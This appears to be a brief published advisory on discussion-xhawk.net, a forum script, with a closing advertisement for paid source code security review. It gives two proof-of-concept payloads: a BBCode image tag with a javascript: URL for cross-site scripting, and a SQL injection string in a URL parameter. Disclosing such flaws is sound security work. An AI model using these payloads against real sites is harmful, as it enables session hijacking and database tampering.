PoC/Exploit for BBCode img XSS and SQL-inj in discussion-xhawk.net

Published Proof of Concept code - BBCode img XSS and SQL-inj in discussion-xhawk.net.

Description
Available
Solution
Not available - check xhawk.net website

1. BBCode Cross-Site Scripting Example:

[img]javascript:alert(123)[/img]


2. SQL Injection Example:

http://[host]/test.php?view=9999%20or%201/*

Order Source Code Analysis

Check your website by source code testing of your site or web application made by Aliaksandr Hartsuyeu.The order will be done by experts in website security.